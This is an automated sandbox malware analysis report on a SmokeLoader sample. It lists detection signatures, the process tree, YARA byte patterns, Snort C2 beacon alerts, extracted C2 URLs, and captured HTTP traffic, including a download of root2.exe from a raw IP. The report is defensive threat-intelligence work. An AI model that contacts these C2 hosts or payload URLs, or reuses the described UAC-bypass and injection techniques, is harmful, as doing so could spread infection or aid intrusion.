Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:750406
MD5:8691765a5ef6354d21bd12c83e9df20b
SHA1:47b548237ced425f7f2ac209ccf0914f8980fa70
SHA256:c9b23216dc8719c25c60fe8334fa5a5c3b9ad54fcaedf94dfb18b8e8ec6cda2b
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected UAC Bypass using CMSTP
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 5328 cmdline: C:\Users\user\Desktop\file.exe MD5: 8691765A5EF6354D21BD12C83E9DF20B)
    • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • FD31.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\Temp\FD31.exe MD5: 823B2BD8B63CAFBEA781C59993109B99)
        • rundll32.exe (PID: 5944 cmdline: "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\Wuwedteata.tmp",Tiuqiiueaur MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • 2B26.exe (PID: 4904 cmdline: C:\Users\user\AppData\Local\Temp\2B26.exe MD5: B30C788530FD281E8C434DA4B8214DB4)
  • cgjtubb (PID: 2948 cmdline: C:\Users\user\AppData\Roaming\cgjtubb MD5: 8691765A5EF6354D21BD12C83E9DF20B)
  • 2B26.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\2B26.exe" MD5: B30C788530FD281E8C434DA4B8214DB4)
  • cgjtubb (PID: 5404 cmdline: C:\Users\user\AppData\Roaming\cgjtubb MD5: 8691765A5EF6354D21BD12C83E9DF20B)
  • cleanup
{"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
Source | Rule | Description | Author | Strings
00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x344:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000002.581088904.0000000000631000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x73b1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000011.00000002.580849383.00000000004F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000011.00000002.580944617.0000000000601000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Source | Rule | Description | Author | Strings
15.2.2B26.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
15.2.2B26.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
10.2.2B26.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
10.2.2B26.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
          No Sigma rule has matched
Timestamp | Source | Destination | Protocol | SID | Classtype
11/20/22-23:29:42.980601 | 192.168.2.4:49732 | 222.236.49.123:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:11.593775 | 192.168.2.4:49706 | 190.140.74.43:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:38.939202 | 192.168.2.4:49729 | 190.147.188.50:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:17.825718 | 192.168.2.4:49712 | 190.140.74.43:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:15.417911 | 192.168.2.4:49710 | 190.140.74.43:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:28:59.421588 | 192.168.2.4:49699 | 175.119.10.231:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:20.999357 | 192.168.2.4:49715 | 138.36.3.134:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:44.502536 | 192.168.2.4:49733 | 175.119.10.231:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:27.376996 | 192.168.2.4:49721 | 222.236.49.123:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:34.630714 | 192.168.2.4:49726 | 175.119.10.231:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:40.008032 | 192.168.2.4:49730 | 210.182.29.70:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:36.126865 | 192.168.2.4:49727 | 210.182.29.70:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:19.586363 | 192.168.2.4:49714 | 222.236.49.123:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:29.402513 | 192.168.2.4:49723 | 175.119.10.231:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:10.022918 | 192.168.2.4:49705 | 210.182.29.70:80 | TCP | 2851815 | A Network Trojan was detected
11/20/22-23:29:08.366632 | 192.168.2.4:49704 | 138.36.3.134:80 | TCP | 2851815 | A Network Trojan was detected

          AV Detection

          Source: http://piratia.su/tmp/URL Reputation: Label: malware
          Source: http://123.253.32.170/root2.exeAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\Wuwedteata.tmpReversingLabs: Detection: 25%
          Source: file.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\cgjtubbJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeJoe Sandbox ML: detected
          Source: 15.2.2B26.exe.2a8e12c.2.unpackAvira: Label: TR/Patched.Ren.Gen7
          Source: 8.2.FD31.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
          Source: 00000004.00000000.367013975.0000000004641000.00000020.80000000.00040000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://cracker.biz/tmp/", "http://piratia-life.ru/tmp/", "http://piratia.su/tmp/"]}
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F306A CryptImportKey,_itoa,8_2_004F306A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004DA07A CryptBinaryToStringA,8_2_004DA07A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048600C CryptReleaseContext,8_2_0048600C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004F210A GetTokenInformation,HttpSendRequestW,CryptAcquireContextA,8_2_004F210A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BF25C CryptBinaryToStringA,8_2_004BF25C
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B42E2 CryptDecrypt,CryptDestroyKey,8_2_004B42E2
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_005032A3 CryptImportKey,8_2_005032A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B6340 CryptImportKey,8_2_004B6340
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00495303 CryptImportKey,8_2_00495303
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D13C5 RegisterClassW,CryptBinaryToStringA,GetModuleHandleW,GetModuleHandleW,8_2_004D13C5
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0046F403 SetLastError,CryptAcquireContextA,Process32NextW,8_2_0046F403
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D442B CryptBinaryToStringA,8_2_004D442B
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B7495 CryptExportKey,8_2_004B7495
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B3560 CryptCreateHash,VirtualAllocEx,8_2_004B3560
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C6560 CryptBinaryToStringA,8_2_004C6560
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0049868A HttpOpenRequestW,CryptReleaseContext,8_2_0049868A
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EB7A3 CryptAcquireContextA,8_2_004EB7A3
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C497F CryptEncrypt,8_2_004C497F
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D3903 CryptBinaryToStringA,8_2_004D3903
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C49C6 CryptEncrypt,CryptEncrypt,8_2_004C49C6
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B89DC CryptAcquireContextA,8_2_004B89DC
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048E980 CryptAcquireContextA,8_2_0048E980
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4A53 CryptDestroyKey,CryptDestroyKey,8_2_004C4A53
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004B0A6E CryptHashData,8_2_004B0A6E
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_00467A70 CryptBinaryToStringA,8_2_00467A70
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004BEACF CryptImportKey,8_2_004BEACF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004D7AEB CryptBinaryToStringA,HttpSendRequestW,8_2_004D7AEB
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EEAF6 CryptAcquireContextA,8_2_004EEAF6
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004EDAAF CryptAcquireContextA,8_2_004EDAAF
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_0048CC12 CryptAcquireContextA,GetProcAddress,CryptImportKey,8_2_0048CC12
          Source: C:\Users\user\AppData\Local\Temp\FD31.exeCode function: 8_2_004C4C3A CryptBinaryToStringA,8_2_004C4C3A

          Exploits

          Source: Yara matchFile source: 15.2.2B26.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.2B26.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.494179230.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.473645142.0000000000413000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY

          Compliance

          Source: C:\Users\user\AppData\Local\Temp\FD31.exeUnpacked PE file: 8.2.FD31.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 10.2.2B26.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\Temp\2B26.exeUnpacked PE file: 15.2.2B26.exe.400000.0.unpack
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49716 version: TLS 1.2
          Source: Binary string: PC:\wekeledo-cilebac.pdb0_ source: file.exe, cgjtubb.4.dr
          Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 2B26.exe, 0000000A.00000002.473602771.0000000000410000.00000040.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000002.494160010.0000000000410000.00000040.00000001.01000000.0000000A.sdmp
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr
          Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 2B26.exe, 0000000F.00000002.495056481.00000000008B0000.00000004.00000020.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 2B26.exe, 0000000F.00000002.541911252.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp, 2B26.exe, 0000000F.00000002.501354011.0000000002A88000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\hicimusafaye.pdb source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\wekeledo-cilebac.pdb source: file.exe, cgjtubb.4.dr
          Source: Binary string: TC:\hicimusafaye.pdb0_ source: FD31.exe, 00000008.00000000.428535544.0000000000401000.00000020.00000001.01000000.00000008.sdmp, FD31.exe.4.dr
          Source: Binary string: C:\tipalowi\48\cibo\rorijagumew\veh\jixanuwud42_goku.pdb0_ source: 2B26.exe, 0000000A.00000000.460526248.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe, 0000000F.00000000.473105275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2B26.exe.4.dr

          Networking

          Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
          Source: C:\Windows\explorer.exeDomain query: freeshmex.at
          Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49699 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49704 -> 138.36.3.134:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49705 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49706 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49710 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49712 -> 190.140.74.43:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49714 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49715 -> 138.36.3.134:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49721 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49723 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49726 -> 175.119.10.231:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49727 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49729 -> 190.147.188.50:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49730 -> 210.182.29.70:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49732 -> 222.236.49.123:80
          Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49733 -> 175.119.10.231:80
          Source: Malware configuration extractorURLs: http://cracker.biz/tmp/
          Source: Malware configuration extractorURLs: http://piratia-life.ru/tmp/
          Source: Malware configuration extractorURLs: http://piratia.su/tmp/
          Source: Joe Sandbox ViewASN Name: TelmexColombiaSACO TelmexColombiaSACO
          Source: Joe Sandbox ViewASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
          Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
          Source: Joe Sandbox ViewIP Address: 190.147.188.50 190.147.188.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.2Date: Sun, 20 Nov 2022 22:29:04 GMTContent-Type: application/octet-streamContent-Length: 1134592Last-Modified: Sun, 20 Nov 2022 22:20:03 GMTConnection: keep-aliveETag: "637aa813-115000"Accept-Ranges: bytes
          Source: global trafficHTTP traffic detected: GET /upload/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: thepokeway.nl
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idgtg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iatco.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svuhccb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmevykp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pewoqsllm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: freeshmex.at
          Source: global trafficHTTP traffic detected: GET /root2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 123.253.32.170
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhuqghmu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwljygwi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mubvqnkrma.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtnnoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulhgwivcot.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pydpo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebktpqpafx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://asqgcaowns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjowxl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltpqmt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlkbyd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvcqra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmtttoldxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hubudix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feciyrtt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mwivfd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iqeagnejjt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://epgfrxxkra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jksmgkjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctvfqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sopric.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyiltqe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqevfdrdxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: freeshmex.at
          Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkqddhkgrs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: freeshmex.at
